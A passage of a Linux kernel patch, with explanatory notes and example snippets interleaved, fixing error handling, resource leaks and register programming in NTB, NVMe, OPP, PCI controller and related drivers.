+ 					 DP83TD510E_GENCFG_INT_EN);
+ 		if (ret)
+ 			return ret;
+-
+-		/* Clear any pending interrupts */
+-		ret = phy_write_mmd(phydev, MDIO_MMD_VEND2, DP83TD510E_PHY_STS,
+-				    0x0);
+ 	}
+ 
+ 	return ret;
+@@ -94,14 +89,6 @@ static irqreturn_t dp83td510_handle_interrupt(struct phy_device *phydev)
+ {
+ 	int  ret;
+ 
+-	ret = phy_read_mmd(phydev, MDIO_MMD_VEND2, DP83TD510E_PHY_STS);
+-	if (ret < 0) {
+-		phy_error(phydev);
+-		return IRQ_NONE;
+-	} else if (!(ret & DP83TD510E_STS_MII_INT)) {
+-		return IRQ_NONE;
+-	}
+-
+ 	/* Read the current enabled interrupts */
+ 	ret = phy_read_mmd(phydev, MDIO_MMD_VEND2, DP83TD510E_INTERRUPT_REG_1);
+ 	if (ret < 0) {
+diff --git a/drivers/net/wireless/cisco/airo.c b/drivers/net/wireless/cisco/airo.c
+index fb2c35bd73bb1..f6362429b735b 100644
+--- a/drivers/net/wireless/cisco/airo.c
++++ b/drivers/net/wireless/cisco/airo.c
+@@ -6146,8 +6146,11 @@ static int airo_get_rate(struct net_device *dev,
+ {
+ 	struct airo_info *local = dev->ml_priv;
+ 	StatusRid status_rid;		/* Card status info */
++	int ret;
+ 
+-	readStatusRid(local, &status_rid, 1);
++	ret = readStatusRid(local, &status_rid, 1);
++	if (ret)
++		return -EBUSY;
+ 
+ 	vwrq->value = le16_to_cpu(status_rid.currentXmitRate) * 500000;
+ 	/* If more than one rate, set auto */
+diff --git a/drivers/net/wireless/realtek/rtw89/debug.c b/drivers/net/wireless/realtek/rtw89/debug.c
+index 50701c55ed602..ec0af903961f0 100644
+--- a/drivers/net/wireless/realtek/rtw89/debug.c
++++ b/drivers/net/wireless/realtek/rtw89/debug.c
+@@ -2130,17 +2130,18 @@ static ssize_t rtw89_debug_priv_send_h2c_set(struct file *filp,
+ 	struct rtw89_debugfs_priv *debugfs_priv = filp->private_data;
+ 	struct rtw89_dev *rtwdev = debugfs_priv->rtwdev;
+ 	u8 *h2c;
++	int ret;
+ 	u16 h2c_len = count / 2;
+ 
+ 	h2c = rtw89_hex2bin_user(rtwdev, user_buf, count);
+ 	if (IS_ERR(h2c))
+ 		return -EFAULT;
+ 
+-	rtw89_fw_h2c_raw(rtwdev, h2c, h2c_len);
++	ret = rtw89_fw_h2c_raw(rtwdev, h2c, h2c_len);
+ 
+ 	kfree(h2c);
+ 
+-	return count;
++	return ret ? ret : count;
+ }
+ 
+ static int
+diff --git a/drivers/ntb/hw/amd/ntb_hw_amd.c b/drivers/ntb/hw/amd/ntb_hw_amd.c
+index 04550b1f984c6..730f2103b91d1 100644
+--- a/drivers/ntb/hw/amd/ntb_hw_amd.c
++++ b/drivers/ntb/hw/amd/ntb_hw_amd.c
+@@ -1338,12 +1338,17 @@ static struct pci_driver amd_ntb_pci_driver = {
+ 
+ static int __init amd_ntb_pci_driver_init(void)
+ {
++	int ret;
+ 	pr_info("%s %s\n", NTB_DESC, NTB_VER);
+ 
+ 	if (debugfs_initialized())
+ 		debugfs_dir = debugfs_create_dir(KBUILD_MODNAME, NULL);
+ 
+-	return pci_register_driver(&amd_ntb_pci_driver);
++	ret = pci_register_driver(&amd_ntb_pci_driver);
++	if (ret)
++		debugfs_remove_recursive(debugfs_dir);
++
++	return ret;
+ }
+ module_init(amd_ntb_pci_driver_init);
+ 
+diff --git a/drivers/ntb/hw/idt/ntb_hw_idt.c b/drivers/ntb/hw/idt/ntb_hw_idt.c
+index 0ed6f809ff2ee..51799fccf8404 100644
+--- a/drivers/ntb/hw/idt/ntb_hw_idt.c
++++ b/drivers/ntb/hw/idt/ntb_hw_idt.c
+@@ -2891,6 +2891,7 @@ static struct pci_driver idt_pci_driver = {
+ 
+ static int __init idt_pci_driver_init(void)
+ {
++	int ret;
+ 	pr_info("%s %s\n", NTB_DESC, NTB_VER);
+ 
+ 	/* Create the top DebugFS directory if the FS is initialized */
+@@ -2898,7 +2899,11 @@ static int __init idt_pci_driver_init(void)
+ 		dbgfs_topdir = debugfs_create_dir(KBUILD_MODNAME, NULL);
+ 
+ 	/* Register the NTB hardware driver to handle the PCI device */
+-	return pci_register_driver(&idt_pci_driver);
++	ret = pci_register_driver(&idt_pci_driver);
++	if (ret)
++		debugfs_remove_recursive(dbgfs_topdir);
++
++	return ret;
+ }
+ module_init(idt_pci_driver_init);
+ 
+diff --git a/drivers/ntb/hw/intel/ntb_hw_gen1.c b/drivers/ntb/hw/intel/ntb_hw_gen1.c
+index 84772013812bf..60a4ebc7bf35a 100644
+--- a/drivers/ntb/hw/intel/ntb_hw_gen1.c
++++ b/drivers/ntb/hw/intel/ntb_hw_gen1.c
+@@ -2064,12 +2064,17 @@ static struct pci_driver intel_ntb_pci_driver = {
+ 
+ static int __init intel_ntb_pci_driver_init(void)
+ {
++	int ret;
+ 	pr_info("%s %s\n", NTB_DESC, NTB_VER);
+ 
+ 	if (debugfs_initialized())
+ 		debugfs_dir = debugfs_create_dir(KBUILD_MODNAME, NULL);
+ 
+-	return pci_register_driver(&intel_ntb_pci_driver);
++	ret = pci_register_driver(&intel_ntb_pci_driver);
++	if (ret)
++		debugfs_remove_recursive(debugfs_dir);
++
++	return ret;
+ }
+ module_init(intel_ntb_pci_driver_init);
+ 
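
The same leak is fixed in all three NTB drivers above (amd, idt, intel): a debugfs directory created during module init was left behind whenever pci_register_driver() failed. The shared shape of the fix, with example_pci_driver and debugfs_dir as placeholder names:

static int __init example_driver_init(void)
{
	int ret;

	if (debugfs_initialized())
		debugfs_dir = debugfs_create_dir(KBUILD_MODNAME, NULL);

	ret = pci_register_driver(&example_pci_driver);
	if (ret)
		/* registration failed: undo the debugfs setup */
		debugfs_remove_recursive(debugfs_dir);

	return ret;
}
module_init(example_driver_init);
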
+diff --git a/drivers/ntb/ntb_transport.c b/drivers/ntb/ntb_transport.c
+index a9b97ebc71ac5..2abd2235bbcab 100644
+--- a/drivers/ntb/ntb_transport.c
++++ b/drivers/ntb/ntb_transport.c
+@@ -410,7 +410,7 @@ int ntb_transport_register_client_dev(char *device_name)
+ 
+ 		rc = device_register(dev);
+ 		if (rc) {
+-			kfree(client_dev);
++			put_device(dev);
+ 			goto err;
+ 		}
+ 
+diff --git a/drivers/ntb/test/ntb_tool.c b/drivers/ntb/test/ntb_tool.c
+index 5ee0afa621a95..eeeb4b1c97d2c 100644
+--- a/drivers/ntb/test/ntb_tool.c
++++ b/drivers/ntb/test/ntb_tool.c
+@@ -998,6 +998,8 @@ static int tool_init_mws(struct tool_ctx *tc)
+ 		tc->peers[pidx].outmws =
+ 			devm_kcalloc(&tc->ntb->dev, tc->peers[pidx].outmw_cnt,
+ 				   sizeof(*tc->peers[pidx].outmws), GFP_KERNEL);
++		if (tc->peers[pidx].outmws == NULL)
++			return -ENOMEM;
+ 
+ 		for (widx = 0; widx < tc->peers[pidx].outmw_cnt; widx++) {
+ 			tc->peers[pidx].outmws[widx].pidx = pidx;
+diff --git a/drivers/nvme/host/core.c b/drivers/nvme/host/core.c
+index 560ce2f05a96d..fd73db8a535d8 100644
+--- a/drivers/nvme/host/core.c
++++ b/drivers/nvme/host/core.c
+@@ -4175,10 +4175,40 @@ static int nvme_init_ns_head(struct nvme_ns *ns, struct nvme_ns_info *info)
+ 
+ 	ret = nvme_global_check_duplicate_ids(ctrl->subsys, &info->ids);
+ 	if (ret) {
+-		dev_err(ctrl->device,
+-			"globally duplicate IDs for nsid %d\n", info->nsid);
++		/*
++		 * We've found two different namespaces on two different
++		 * subsystems that report the same ID.  This is pretty nasty
++		 * for anything that actually requires unique device
++		 * identification.  In the kernel we need this for multipathing,
++		 * and in user space the /dev/disk/by-id/ links rely on it.
++		 *
++		 * If the device also claims to be multi-path capable, back off
++		 * here now and refuse to probe the second device, as this is a
++		 * recipe for data corruption.  If not, this is probably a
++		 * cheap consumer device on the PCIe bus, so let the user
++		 * proceed and use the shiny toy, but warn that with a changed
++		 * probing order (which, given our async probing, could just be
++		 * a device taking longer to start up) the other device could
++		 * show up at any time.
++		 */
+ 		nvme_print_device_info(ctrl);
+-		return ret;
++		if ((ns->ctrl->ops->flags & NVME_F_FABRICS) || /* !PCIe */
++		    ((ns->ctrl->subsys->cmic & NVME_CTRL_CMIC_MULTI_CTRL) &&
++		     info->is_shared)) {
++			dev_err(ctrl->device,
++				"ignoring nsid %d because of duplicate IDs\n",
++				info->nsid);
++			return ret;
++		}
++
++		dev_err(ctrl->device,
++			"clearing duplicate IDs for nsid %d\n", info->nsid);
++		dev_err(ctrl->device,
++			"use of /dev/disk/by-id/ may cause data corruption\n");
++		memset(&info->ids.nguid, 0, sizeof(info->ids.nguid));
++		memset(&info->ids.uuid, 0, sizeof(info->ids.uuid));
++		memset(&info->ids.eui64, 0, sizeof(info->ids.eui64));
++		ctrl->quirks |= NVME_QUIRK_BOGUS_NID;
+ 	}
+ 
+ 	mutex_lock(&ctrl->subsys->lock);
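
The policy described in the comment above reduces to one predicate: duplicate IDs are only fatal when another path could actually reach the namespace. A hypothetical helper capturing the check from this hunk (not part of the patch; names mirror the code above):

static bool nvme_duplicate_ids_are_fatal(struct nvme_ctrl *ctrl,
					 struct nvme_ns_info *info)
{
	/* Fabrics controllers are shared by definition. */
	if (ctrl->ops->flags & NVME_F_FABRICS)
		return true;

	/* A multi-controller subsystem with a shared namespace needs
	 * unique IDs for multipathing to be safe.
	 */
	return (ctrl->subsys->cmic & NVME_CTRL_CMIC_MULTI_CTRL) &&
	       info->is_shared;
}
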
+diff --git a/drivers/nvme/host/pci.c b/drivers/nvme/host/pci.c
+index 145fa7ef3f740..ce2e628f94a05 100644
+--- a/drivers/nvme/host/pci.c
++++ b/drivers/nvme/host/pci.c
+@@ -1022,7 +1022,7 @@ static __always_inline void nvme_pci_unmap_rq(struct request *req)
+ 	        struct nvme_iod *iod = blk_mq_rq_to_pdu(req);
+ 
+ 		dma_unmap_page(dev->dev, iod->meta_dma,
+-			       rq_integrity_vec(req)->bv_len, rq_data_dir(req));
++			       rq_integrity_vec(req)->bv_len, rq_dma_dir(req));
+ 	}
+ 
+ 	if (blk_rq_nr_phys_segments(req))
+diff --git a/drivers/opp/core.c b/drivers/opp/core.c
+index e87567dbe99f2..d707214069ca9 100644
+--- a/drivers/opp/core.c
++++ b/drivers/opp/core.c
+@@ -1348,7 +1348,10 @@ static struct opp_table *_allocate_opp_table(struct device *dev, int index)
+ 	return opp_table;
+ 
+ remove_opp_dev:
++	_of_clear_opp_table(opp_table);
+ 	_remove_opp_dev(opp_dev, opp_table);
++	mutex_destroy(&opp_table->genpd_virt_dev_lock);
++	mutex_destroy(&opp_table->lock);
+ err:
+ 	kfree(opp_table);
+ 	return ERR_PTR(ret);
+diff --git a/drivers/pci/controller/dwc/pcie-qcom.c b/drivers/pci/controller/dwc/pcie-qcom.c
+index 49905b2a99607..d24712a76ba7c 100644
+--- a/drivers/pci/controller/dwc/pcie-qcom.c
++++ b/drivers/pci/controller/dwc/pcie-qcom.c
+@@ -1176,6 +1176,8 @@ static int qcom_pcie_post_init_2_3_3(struct qcom_pcie *pcie)
+ 	writel(PCI_EXP_DEVCTL2_COMP_TMOUT_DIS, pci->dbi_base + offset +
+ 		PCI_EXP_DEVCTL2);
+ 
++	dw_pcie_dbi_ro_wr_dis(pci);
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/pci/controller/pcie-rockchip-ep.c b/drivers/pci/controller/pcie-rockchip-ep.c
+index d1a200b93b2bf..827d91e73efab 100644
+--- a/drivers/pci/controller/pcie-rockchip-ep.c
++++ b/drivers/pci/controller/pcie-rockchip-ep.c
+@@ -125,6 +125,7 @@ static void rockchip_pcie_prog_ep_ob_atu(struct rockchip_pcie *rockchip, u8 fn,
+ static int rockchip_pcie_ep_write_header(struct pci_epc *epc, u8 fn, u8 vfn,
+ 					 struct pci_epf_header *hdr)
+ {
++	u32 reg;
+ 	struct rockchip_pcie_ep *ep = epc_get_drvdata(epc);
+ 	struct rockchip_pcie *rockchip = &ep->rockchip;
+ 
+@@ -137,8 +138,9 @@ static int rockchip_pcie_ep_write_header(struct pci_epc *epc, u8 fn, u8 vfn,
+ 				    PCIE_CORE_CONFIG_VENDOR);
+ 	}
+ 
+-	rockchip_pcie_write(rockchip, hdr->deviceid << 16,
+-			    ROCKCHIP_PCIE_EP_FUNC_BASE(fn) + PCI_VENDOR_ID);
++	reg = rockchip_pcie_read(rockchip, PCIE_EP_CONFIG_DID_VID);
++	reg = (reg & 0xFFFF) | (hdr->deviceid << 16);
++	rockchip_pcie_write(rockchip, reg, PCIE_EP_CONFIG_DID_VID);
+ 
+ 	rockchip_pcie_write(rockchip,
+ 			    hdr->revid |
+@@ -312,15 +314,15 @@ static int rockchip_pcie_ep_set_msi(struct pci_epc *epc, u8 fn, u8 vfn,
+ {
+ 	struct rockchip_pcie_ep *ep = epc_get_drvdata(epc);
+ 	struct rockchip_pcie *rockchip = &ep->rockchip;
+-	u16 flags;
++	u32 flags;
+ 
+ 	flags = rockchip_pcie_read(rockchip,
+ 				   ROCKCHIP_PCIE_EP_FUNC_BASE(fn) +
+ 				   ROCKCHIP_PCIE_EP_MSI_CTRL_REG);
+ 	flags &= ~ROCKCHIP_PCIE_EP_MSI_CTRL_MMC_MASK;
+ 	flags |=
+-	   ((multi_msg_cap << 1) <<  ROCKCHIP_PCIE_EP_MSI_CTRL_MMC_OFFSET) |
+-	   PCI_MSI_FLAGS_64BIT;
++	   (multi_msg_cap << ROCKCHIP_PCIE_EP_MSI_CTRL_MMC_OFFSET) |
++	   (PCI_MSI_FLAGS_64BIT << ROCKCHIP_PCIE_EP_MSI_FLAGS_OFFSET);
+ 	flags &= ~ROCKCHIP_PCIE_EP_MSI_CTRL_MASK_MSI_CAP;
+ 	rockchip_pcie_write(rockchip, flags,
+ 			    ROCKCHIP_PCIE_EP_FUNC_BASE(fn) +
+@@ -332,7 +334,7 @@ static int rockchip_pcie_ep_get_msi(struct pci_epc *epc, u8 fn, u8 vfn)
+ {
+ 	struct rockchip_pcie_ep *ep = epc_get_drvdata(epc);
+ 	struct rockchip_pcie *rockchip = &ep->rockchip;
+-	u16 flags;
++	u32 flags;
+ 
+ 	flags = rockchip_pcie_read(rockchip,
+ 				   ROCKCHIP_PCIE_EP_FUNC_BASE(fn) +
+@@ -345,48 +347,25 @@ static int rockchip_pcie_ep_get_msi(struct pci_epc *epc, u8 fn, u8 vfn)
+ }
+ 
+ static void rockchip_pcie_ep_assert_intx(struct rockchip_pcie_ep *ep, u8 fn,
+-					 u8 intx, bool is_asserted)
++					 u8 intx, bool do_assert)
+ {
+ 	struct rockchip_pcie *rockchip = &ep->rockchip;
+-	u32 r = ep->max_regions - 1;
+-	u32 offset;
+-	u32 status;
+-	u8 msg_code;
+-
+-	if (unlikely(ep->irq_pci_addr != ROCKCHIP_PCIE_EP_PCI_LEGACY_IRQ_ADDR ||
+-		     ep->irq_pci_fn != fn)) {
+-		rockchip_pcie_prog_ep_ob_atu(rockchip, fn, r,
+-					     AXI_WRAPPER_NOR_MSG,
+-					     ep->irq_phys_addr, 0, 0);
+-		ep->irq_pci_addr = ROCKCHIP_PCIE_EP_PCI_LEGACY_IRQ_ADDR;
+-		ep->irq_pci_fn = fn;
+-	}
+ 
+ 	intx &= 3;
+-	if (is_asserted) {
++
++	if (do_assert) {
+ 		ep->irq_pending |= BIT(intx);
+-		msg_code = ROCKCHIP_PCIE_MSG_CODE_ASSERT_INTA + intx;
++		rockchip_pcie_write(rockchip,
++				    PCIE_CLIENT_INT_IN_ASSERT |
++				    PCIE_CLIENT_INT_PEND_ST_PEND,
++				    PCIE_CLIENT_LEGACY_INT_CTRL);
+ 	} else {
+ 		ep->irq_pending &= ~BIT(intx);
+-		msg_code = ROCKCHIP_PCIE_MSG_CODE_DEASSERT_INTA + intx;
++		rockchip_pcie_write(rockchip,
++				    PCIE_CLIENT_INT_IN_DEASSERT |
++				    PCIE_CLIENT_INT_PEND_ST_NORMAL,
++				    PCIE_CLIENT_LEGACY_INT_CTRL);
+ 	}
+-
+-	status = rockchip_pcie_read(rockchip,
+-				    ROCKCHIP_PCIE_EP_FUNC_BASE(fn) +
+-				    ROCKCHIP_PCIE_EP_CMD_STATUS);
+-	status &= ROCKCHIP_PCIE_EP_CMD_STATUS_IS;
+-
+-	if ((status != 0) ^ (ep->irq_pending != 0)) {
+-		status ^= ROCKCHIP_PCIE_EP_CMD_STATUS_IS;
+-		rockchip_pcie_write(rockchip, status,
+-				    ROCKCHIP_PCIE_EP_FUNC_BASE(fn) +
+-				    ROCKCHIP_PCIE_EP_CMD_STATUS);
+-	}
+-
+-	offset =
+-	   ROCKCHIP_PCIE_MSG_ROUTING(ROCKCHIP_PCIE_MSG_ROUTING_LOCAL_INTX) |
+-	   ROCKCHIP_PCIE_MSG_CODE(msg_code) | ROCKCHIP_PCIE_MSG_NO_DATA;
+-	writel(0, ep->irq_cpu_addr + offset);
+ }
+ 
+ static int rockchip_pcie_ep_send_legacy_irq(struct rockchip_pcie_ep *ep, u8 fn,
+@@ -416,7 +395,7 @@ static int rockchip_pcie_ep_send_msi_irq(struct rockchip_pcie_ep *ep, u8 fn,
+ 					 u8 interrupt_num)
+ {
+ 	struct rockchip_pcie *rockchip = &ep->rockchip;
+-	u16 flags, mme, data, data_mask;
++	u32 flags, mme, data, data_mask;
+ 	u8 msi_count;
+ 	u64 pci_addr, pci_addr_mask = 0xff;
+ 
+@@ -506,6 +485,7 @@ static const struct pci_epc_features rockchip_pcie_epc_features = {
+ 	.linkup_notifier = false,
+ 	.msi_capable = true,
+ 	.msix_capable = false,
++	.align = 256,
+ };
+ 
+ static const struct pci_epc_features*
+@@ -631,6 +611,9 @@ static int rockchip_pcie_ep_probe(struct platform_device *pdev)
+ 
+ 	ep->irq_pci_addr = ROCKCHIP_PCIE_EP_DUMMY_IRQ_ADDR;
+ 
++	rockchip_pcie_write(rockchip, PCIE_CLIENT_CONF_ENABLE,
++			    PCIE_CLIENT_CONFIG);
++
+ 	return 0;
+ err_epc_mem_exit:
+ 	pci_epc_mem_exit(epc);
+diff --git a/drivers/pci/controller/pcie-rockchip.c b/drivers/pci/controller/pcie-rockchip.c
+index 990a00e08bc5b..1aa84035a8bc7 100644
+--- a/drivers/pci/controller/pcie-rockchip.c
++++ b/drivers/pci/controller/pcie-rockchip.c
+@@ -14,6 +14,7 @@
+ #include <linux/clk.h>
+ #include <linux/delay.h>
+ #include <linux/gpio/consumer.h>
++#include <linux/iopoll.h>
+ #include <linux/of_pci.h>
+ #include <linux/phy/phy.h>
+ #include <linux/platform_device.h>
+@@ -153,6 +154,12 @@ int rockchip_pcie_parse_dt(struct rockchip_pcie *rockchip)
+ }
+ EXPORT_SYMBOL_GPL(rockchip_pcie_parse_dt);
+ 
++#define rockchip_pcie_read_addr(addr) rockchip_pcie_read(rockchip, addr)
++/* 100 ms max wait time for PHY PLLs to lock */
++#define RK_PHY_PLL_LOCK_TIMEOUT_US 100000
++/* Sleep should be less than 20ms */
++#define RK_PHY_PLL_LOCK_SLEEP_US 1000
++
+ int rockchip_pcie_init_port(struct rockchip_pcie *rockchip)
+ {
+ 	struct device *dev = rockchip->dev;
+@@ -254,6 +261,16 @@ int rockchip_pcie_init_port(struct rockchip_pcie *rockchip)
+ 		}
+ 	}
+ 
++	err = readx_poll_timeout(rockchip_pcie_read_addr,
++				 PCIE_CLIENT_SIDE_BAND_STATUS,
++				 regs, !(regs & PCIE_CLIENT_PHY_ST),
++				 RK_PHY_PLL_LOCK_SLEEP_US,
++				 RK_PHY_PLL_LOCK_TIMEOUT_US);
++	if (err) {
++		dev_err(dev, "PHY PLLs could not lock, %d\n", err);
++		goto err_power_off_phy;
++	}
++
+ 	/*
+ 	 * Please don't reorder the deassert sequence of the following
+ 	 * four reset pins.
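
The readx_poll_timeout() call above sleeps between reads until the PHY-status bit clears or the 100 ms budget runs out; the rockchip_pcie_read_addr() wrapper exists only so the macro's read op takes a single argument. Hand-expanded, the call behaves roughly like this sketch (the real iopoll.h version uses ktime and re-checks the condition once more after timing out):

	unsigned long timeout = jiffies +
		usecs_to_jiffies(RK_PHY_PLL_LOCK_TIMEOUT_US);

	for (;;) {
		regs = rockchip_pcie_read(rockchip,
					  PCIE_CLIENT_SIDE_BAND_STATUS);
		if (!(regs & PCIE_CLIENT_PHY_ST)) {
			err = 0;		/* PLLs locked */
			break;
		}
		if (time_after(jiffies, timeout)) {
			err = -ETIMEDOUT;
			break;
		}
		usleep_range(RK_PHY_PLL_LOCK_SLEEP_US,
			     RK_PHY_PLL_LOCK_SLEEP_US * 2);
	}
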
+diff --git a/drivers/pci/controller/pcie-rockchip.h b/drivers/pci/controller/pcie-rockchip.h
+index 32c3a859c26b2..8e92dc3339ecc 100644
+--- a/drivers/pci/controller/pcie-rockchip.h
++++ b/drivers/pci/controller/pcie-rockchip.h
+@@ -38,6 +38,13 @@
+ #define   PCIE_CLIENT_MODE_EP            HIWORD_UPDATE(0x0040, 0)
+ #define   PCIE_CLIENT_GEN_SEL_1		  HIWORD_UPDATE(0x0080, 0)
+ #define   PCIE_CLIENT_GEN_SEL_2		  HIWORD_UPDATE_BIT(0x0080)
++#define PCIE_CLIENT_LEGACY_INT_CTRL	(PCIE_CLIENT_BASE + 0x0c)
++#define   PCIE_CLIENT_INT_IN_ASSERT		HIWORD_UPDATE_BIT(0x0002)
++#define   PCIE_CLIENT_INT_IN_DEASSERT		HIWORD_UPDATE(0x0002, 0)
++#define   PCIE_CLIENT_INT_PEND_ST_PEND		HIWORD_UPDATE_BIT(0x0001)
++#define   PCIE_CLIENT_INT_PEND_ST_NORMAL	HIWORD_UPDATE(0x0001, 0)
++#define PCIE_CLIENT_SIDE_BAND_STATUS	(PCIE_CLIENT_BASE + 0x20)
++#define   PCIE_CLIENT_PHY_ST			BIT(12)
+ #define PCIE_CLIENT_DEBUG_OUT_0		(PCIE_CLIENT_BASE + 0x3c)
+ #define   PCIE_CLIENT_DEBUG_LTSSM_MASK		GENMASK(5, 0)
+ #define   PCIE_CLIENT_DEBUG_LTSSM_L1		0x18
+@@ -133,6 +140,8 @@
+ #define PCIE_RC_RP_ATS_BASE		0x400000
+ #define PCIE_RC_CONFIG_NORMAL_BASE	0x800000
+ #define PCIE_RC_CONFIG_BASE		0xa00000
++#define PCIE_EP_CONFIG_BASE		0xa00000
++#define PCIE_EP_CONFIG_DID_VID		(PCIE_EP_CONFIG_BASE + 0x00)
+ #define PCIE_RC_CONFIG_RID_CCR		(PCIE_RC_CONFIG_BASE + 0x08)
+ #define PCIE_RC_CONFIG_DCR		(PCIE_RC_CONFIG_BASE + 0xc4)
+ #define   PCIE_RC_CONFIG_DCR_CSPL_SHIFT		18
+@@ -216,6 +225,7 @@
+ #define ROCKCHIP_PCIE_EP_CMD_STATUS			0x4
+ #define   ROCKCHIP_PCIE_EP_CMD_STATUS_IS		BIT(19)
+ #define ROCKCHIP_PCIE_EP_MSI_CTRL_REG			0x90
++#define   ROCKCHIP_PCIE_EP_MSI_FLAGS_OFFSET		16
+ #define   ROCKCHIP_PCIE_EP_MSI_CTRL_MMC_OFFSET		17
+ #define   ROCKCHIP_PCIE_EP_MSI_CTRL_MMC_MASK		GENMASK(19, 17)
+ #define   ROCKCHIP_PCIE_EP_MSI_CTRL_MME_OFFSET		20
+@@ -223,7 +233,6 @@
+ #define   ROCKCHIP_PCIE_EP_MSI_CTRL_ME				BIT(16)
+ #define   ROCKCHIP_PCIE_EP_MSI_CTRL_MASK_MSI_CAP	BIT(24)
+ #define ROCKCHIP_PCIE_EP_DUMMY_IRQ_ADDR				0x1
+-#define ROCKCHIP_PCIE_EP_PCI_LEGACY_IRQ_ADDR		0x3
+ #define ROCKCHIP_PCIE_EP_FUNC_BASE(fn)	(((fn) << 12) & GENMASK(19, 12))
+ #define ROCKCHIP_PCIE_AT_IB_EP_FUNC_BAR_ADDR0(fn, bar) \
+ 	(PCIE_RC_RP_ATS_BASE + 0x0840 + (fn) * 0x0040 + (bar) * 0x0008)
+diff --git a/drivers/pci/endpoint/functions/pci-epf-test.c b/drivers/pci/endpoint/functions/pci-epf-test.c
+index f0c4d0f77453a..2e8a4de2ababd 100644
+--- a/drivers/pci/endpoint/functions/pci-epf-test.c
++++ b/drivers/pci/endpoint/functions/pci-epf-test.c
+@@ -54,6 +54,9 @@ struct pci_epf_test {
+ 	struct delayed_work	cmd_handler;
+ 	struct dma_chan		*dma_chan_tx;
+ 	struct dma_chan		*dma_chan_rx;
++	struct dma_chan		*transfer_chan;
++	dma_cookie_t		transfer_cookie;
++	enum dma_status		transfer_status;
+ 	struct completion	transfer_complete;
+ 	bool			dma_supported;
+ 	bool			dma_private;
+@@ -85,8 +88,14 @@ static size_t bar_size[] = { 512, 512, 1024, 16384, 131072, 1048576 };
+ static void pci_epf_test_dma_callback(void *param)
+ {
+ 	struct pci_epf_test *epf_test = param;
+-
+-	complete(&epf_test->transfer_complete);
++	struct dma_tx_state state;
++
++	epf_test->transfer_status =
++		dmaengine_tx_status(epf_test->transfer_chan,
++				    epf_test->transfer_cookie, &state);
++	if (epf_test->transfer_status == DMA_COMPLETE ||
++	    epf_test->transfer_status == DMA_ERROR)
++		complete(&epf_test->transfer_complete);
+ }
+ 
+ /**
+@@ -120,7 +129,6 @@ static int pci_epf_test_data_transfer(struct pci_epf_test *epf_test,
+ 	struct dma_async_tx_descriptor *tx;
+ 	struct dma_slave_config sconf = {};
+ 	struct device *dev = &epf->dev;
+-	dma_cookie_t cookie;
+ 	int ret;
+ 
+ 	if (IS_ERR_OR_NULL(chan)) {
+@@ -151,26 +159,34 @@ static int pci_epf_test_data_transfer(struct pci_epf_test *epf_test,
+ 		return -EIO;
+ 	}
+ 
++	reinit_completion(&epf_test->transfer_complete);
++	epf_test->transfer_chan = chan;
+ 	tx->callback = pci_epf_test_dma_callback;
+ 	tx->callback_param = epf_test;
+-	cookie = tx->tx_submit(tx);
+-	reinit_completion(&epf_test->transfer_complete);
++	epf_test->transfer_cookie = tx->tx_submit(tx);
+ 
+-	ret = dma_submit_error(cookie);
++	ret = dma_submit_error(epf_test->transfer_cookie);
+ 	if (ret) {
+-		dev_err(dev, "Failed to do DMA tx_submit %d\n", cookie);
+-		return -EIO;
++		dev_err(dev, "Failed to do DMA tx_submit %d\n", ret);
++		goto terminate;
+ 	}
+ 
+ 	dma_async_issue_pending(chan);
+ 	ret = wait_for_completion_interruptible(&epf_test->transfer_complete);
+ 	if (ret < 0) {
+-		dmaengine_terminate_sync(chan);
+-		dev_err(dev, "DMA wait_for_completion_timeout\n");
+-		return -ETIMEDOUT;
++		dev_err(dev, "DMA wait_for_completion interrupted\n");
++		goto terminate;
+ 	}
+ 
+-	return 0;
++	if (epf_test->transfer_status == DMA_ERROR) {
++		dev_err(dev, "DMA transfer failed\n");
++		ret = -EIO;
++	}
++
++terminate:
++	dmaengine_terminate_sync(chan);
++
++	return ret;
+ }
+ 
+ struct epf_dma_filter {
+diff --git a/drivers/pci/pci.c b/drivers/pci/pci.c
+index 98d841a7b45bb..88c4372499825 100644
+--- a/drivers/pci/pci.c
++++ b/drivers/pci/pci.c
+@@ -2942,13 +2942,13 @@ static const struct dmi_system_id bridge_d3_blacklist[] = {
+ 	{
+ 		/*
+ 		 * Downstream device is not accessible after putting a root port
+-		 * into D3cold and back into D0 on Elo i2.
++		 * into D3cold and back into D0 on Elo Continental Z2 board
+ 		 */
+-		.ident = "Elo i2",
++		.ident = "Elo Continental Z2",
+ 		.matches = {
+-			DMI_MATCH(DMI_SYS_VENDOR, "Elo Touch Solutions"),
+-			DMI_MATCH(DMI_PRODUCT_NAME, "Elo i2"),
+-			DMI_MATCH(DMI_PRODUCT_VERSION, "RevB"),
++			DMI_MATCH(DMI_BOARD_VENDOR, "Elo Touch Solutions"),
++			DMI_MATCH(DMI_BOARD_NAME, "Geminilake"),
++			DMI_MATCH(DMI_BOARD_VERSION, "Continental Z2"),
+ 		},
+ 	},
+ #endif
+diff --git a/drivers/pci/probe.c b/drivers/pci/probe.c
+index 90e676439170b..7170516298b0b 100644
+--- a/drivers/pci/probe.c
++++ b/drivers/pci/probe.c
+@@ -994,8 +994,10 @@ static int pci_register_host_bridge(struct pci_host_bridge *bridge)
+ 	resource_list_for_each_entry_safe(window, n, &resources) {
+ 		offset = window->offset;
+ 		res = window->res;
+-		if (!res->flags && !res->start && !res->end)
++		if (!res->flags && !res->start && !res->end) {
++			release_resource(res);
+ 			continue;
++		}
+ 
+ 		list_move_tail(&window->node, &bridge->windows);
+ 
+diff --git a/drivers/pci/quirks.c b/drivers/pci/quirks.c
+index ccc90656130a0..472fa2c8ebcec 100644
+--- a/drivers/pci/quirks.c
++++ b/drivers/pci/quirks.c
+@@ -4174,6 +4174,8 @@ DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_MARVELL_EXT, 0x9220,
+ /* https://bugzilla.kernel.org/show_bug.cgi?id=42679#c49 */
+ DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_MARVELL_EXT, 0x9230,
+ 			 quirk_dma_func1_alias);
++DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_MARVELL_EXT, 0x9235,
++			 quirk_dma_func1_alias);
+ DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_TTI, 0x0642,
+ 			 quirk_dma_func1_alias);
+ DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_TTI, 0x0645,
+diff --git a/drivers/perf/riscv_pmu.c b/drivers/perf/riscv_pmu.c
+index ebca5eab9c9be..56897d4d4fd3e 100644
+--- a/drivers/perf/riscv_pmu.c
++++ b/drivers/perf/riscv_pmu.c
